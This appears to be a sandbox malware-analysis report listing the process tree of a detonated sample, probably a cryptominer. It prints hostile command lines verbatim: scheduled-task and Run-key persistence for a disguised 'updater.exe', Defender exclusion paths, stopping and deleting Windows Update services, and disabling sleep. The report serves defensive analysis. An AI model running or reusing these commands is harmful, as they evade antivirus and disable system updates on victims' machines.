C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' } | level 2
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 | level 2
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -hibernate-timeout-ac 0 | level 3
- Suspicious use of AdjustPrivilegeToken
PID:2312 -
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -hibernate-timeout-dc 0 | level 3
- Suspicious use of AdjustPrivilegeToken
PID:3476 -
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -standby-timeout-ac 0 | level 3
- Suspicious use of AdjustPrivilegeToken
PID:552 -
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -standby-timeout-dc 0 | level 3
- Suspicious use of AdjustPrivilegeToken
PID:516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" } | level 2
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\schtasks.exe | cmdline: "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC | level 3 | PID:1848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force | level 2
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4416 -
C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f | level 2 | PID:4328
-
C:\Windows\System32\sc.exe | cmdline: sc stop UsoSvc | level 3
- Launches sc.exe
PID:3708 -
C:\Windows\System32\sc.exe | cmdline: sc stop WaaSMedicSvc | level 3
- Launches sc.exe
PID:1436 -
C:\Windows\System32\sc.exe | cmdline: sc stop wuauserv | level 3
- Launches sc.exe
PID:812 -
C:\Windows\System32\sc.exe | cmdline: sc stop bits | level 3
- Launches sc.exe
PID:3036 -
C:\Windows\System32\sc.exe | cmdline: sc stop dosvc | level 3
- Launches sc.exe
PID:1656 -
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f | level 3 | PID:368
-
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f | level 3 | PID:4592
-
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f | level 3 | PID:2728
-
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f | level 3 | PID:3440
-
C:\Windows\System32\reg.exe | cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f | level 3 | PID:3684
-
C:\Windows\System32\cmd.exe | cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 | level 2 | PID:3456
-
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -hibernate-timeout-ac 0 | level 3 | PID:3172
-
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -hibernate-timeout-dc 0 | level 3 | PID:3512
-
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -standby-timeout-ac 0 | level 3 | PID:4988
-
C:\Windows\System32\powercfg.exe | cmdline: powercfg /x -standby-timeout-dc 0 | level 3 | PID:1244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' } | level 2
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3208 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4832 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1064 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:4772 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:976
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 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2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:644
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:2892
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:556
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 360 -p 2932 -ip 29321⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:3608
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:2148
Network
MITRE ATT&CK Enterprise v6
Downloads